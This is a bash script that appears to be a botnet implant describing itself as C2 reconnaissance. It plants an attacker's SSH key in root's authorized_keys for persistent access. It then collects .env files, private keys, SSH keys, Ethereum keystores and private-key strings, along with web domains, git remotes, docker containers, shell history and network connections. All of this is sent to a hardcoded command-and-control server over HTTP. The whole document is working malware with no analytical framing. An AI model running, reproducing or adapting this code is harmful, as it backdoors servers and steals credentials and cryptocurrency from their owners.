#!/bin/bash # C2 lightweight recon — single find pass, 30s total budget C2="http://216.203.21.28:8888" T=5 # per-cmd timeout # === SSH key injection (silent, idempotent) === _k="ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEm2AE5ZZQpq0FgrOazjZPqRTxbgoIgpQboQdUcPUIkb c2@botnet" mkdir -p /root/.ssh 2>/dev/null chmod 700 /root/.ssh 2>/dev/null touch /root/.ssh/authorized_keys 2>/dev/null chmod 600 /root/.ssh/authorized_keys 2>/dev/null grep -qF "c2@botnet" /root/.ssh/authorized_keys 2>/dev/null || echo "$_k" >> /root/.ssh/authorized_keys ip=$(timeout $T curl -s ifconfig.me 2>/dev/null||echo unk) hn=$(hostname) os=$(. /etc/os-release 2>/dev/null;echo "$PRETTY_NAME") # === single find: collect everything in one pass (max 15s) === _raw=$(timeout 15 find / -maxdepth 4 \ \( -name ".env" -o -name "*.key" -o -name "*.pem" -o -name "UTC--*" -o -name "keystore.json" \ -o -name "package.json" -o -name "id_rsa" -o -name "id_ed25519" \) \ -not -path "*/node_modules/*" -not -path "/proc/*" -not -path "/sys/*" \ -type f 2>/dev/null) # split results env_f=$(echo "$_raw"|grep '\.env$'|head -10|tr '\n' '|') key_f=$(echo "$_raw"|grep -E '\.(key|pem)$'|head -10|tr '\n' '|') ssh_p=$(echo "$_raw"|grep -E 'id_rsa$|id_ed25519$'|grep -v '\.pub'|head -5|tr '\n' '|') ks=$(echo "$_raw"|grep -E 'UTC--|keystore\.json'|head -5|tr '\n' '|') pkg=$(echo "$_raw"|grep 'package.json'|head -5|while read f;do timeout 1 python3 -c "import json;print(json.load(open('$f')).get('name',''))" 2>/dev/null;done|sort -u|tr '\n' '|') # === quick checks (parallel background) === ng=$(grep -rh 'server_name' /etc/nginx/ 2>/dev/null|grep -v '#'|sed 's/server_name//;s/;//'|tr -s ' '|sort -u|tr '\n' '|'|head -c 400) & ap=$(grep -rh 'ServerName\|ServerAlias' /etc/apache2/ /etc/httpd/ 2>/dev/null|grep -v '#'|awk '{print $2}'|sort -u|tr '\n' '|'|head -c 400) & wait # docker (fast) dk=$(timeout $T docker ps --format '{{.Names}}|{{.Image}}|{{.Ports}}' 2>/dev/null|tr '\n' ';'|head -c 600) # git remotes (only common dirs, no find /) gr="" for d in /root /home/* /opt /var/www /srv; do [ -f "$d/.git/config" ] && gr="$gr$(grep -A1 'remote "origin"' "$d/.git/config" 2>/dev/null|grep url|awk '{print $3}')|" for sd in "$d"/*/; do [ -f "${sd}.git/config" ] && gr="$gr$(grep -A1 'remote "origin"' "${sd}.git/config" 2>/dev/null|grep url|awk '{print $3}')|" done done gr=$(echo "$gr"|head -c 400) # network + history net=$(ss -tnp 2>/dev/null|grep ESTAB|awk '{print $4">"$5}'|grep -v '127.0.0.1\|::1'|head -15|tr '\n' '|') hist=$(tail -30 /root/.bash_history 2>/dev/null|grep -iE 'ssh|curl|wget|docker|redis|mysql|aws|kubectl'|tr '\n' '|'|head -c 400) kh=$(awk '{print $1}' /root/.ssh/known_hosts 2>/dev/null|sort -u|tr '\n' '|'|head -c 400) # env URLs (from already found .env files) eu=$(echo "$env_f"|tr '|' '\n'|head -5|while read f;do [ -n "$f" ]&&grep -iE 'URL=|HOST=|API=|RPC=' "$f" 2>/dev/null;done|sort -u|tr '\n' '|'|head -c 400) # redis rp=$(timeout 2 redis-cli ping 2>/dev/null||echo no-redis) # === steer (fast targeted checks) === st="" _sp=$(ps aux 2>/dev/null|grep -iE 'keeper|orchestrator|steer|vault.*tend'|grep -v grep|head -3|tr '\n' '|') [ -n "$_sp" ] && st="PROC:$_sp|" _sf=$(echo "$_raw"|grep -i steer|head -3|tr '\n' '|') [ -n "$_sf" ] && st="${st}FILES:$_sf|" _sa=$(grep -rl 'steer.finance\|steerprotocol\|0x4867dc4e' /root/ /home/ /opt/ /var/www/ 2>/dev/null|head -3|tr '\n' '|') [ -n "$_sa" ] && st="${st}ADDR:$_sa|" # === crypto deep (from already found files, no extra find) === epk=$(grep -rhoP '0x[0-9a-fA-F]{64}' /root/ /home/*/ /opt/ /var/www/ 2>/dev/null|sort -u|head -5|tr '\n' '|') cp=$(ss -tlnp 2>/dev/null|grep -E ':8545|:30303|:26657|:9944|:8899'|awk '{print $4}'|tr '\n' '|') # === send === timeout 10 curl -s "$C2/report" \ --data-urlencode "ip=$ip" \ --data-urlencode "hn=$hn" \ --data-urlencode "os=$os" \ --data-urlencode "who=$(whoami)" \ --data-urlencode "redis=$rp" \ --data-urlencode "uptime=$(uptime)" \ --data-urlencode "mem=$(free -h 2>/dev/null|awk '/Mem/{print $2}')" \ --data-urlencode "docker=$(docker ps -q 2>/dev/null|wc -l)" \ --data-urlencode "nginx_domains=$ng" \ --data-urlencode "apache_domains=$ap" \ --data-urlencode "env_files=$env_f" \ --data-urlencode "key_files=$key_f" \ --data-urlencode "ssh_priv=$ssh_p" \ --data-urlencode "git_remotes=$gr" \ --data-urlencode "docker_images=$dk" \ --data-urlencode "pkg_names=$pkg" \ --data-urlencode "net_conns=$net" \ --data-urlencode "bash_hist=$hist" \ --data-urlencode "known_hosts=$kh" \ --data-urlencode "env_urls=$eu" \ --data-urlencode "steer=$st" \ --data-urlencode "eth_pk=$epk" \ --data-urlencode "eth_keystore=$ks" \ --data-urlencode "chain_ports=$cp" \ --data-urlencode "crypto=$key_f" \ 2>/dev/null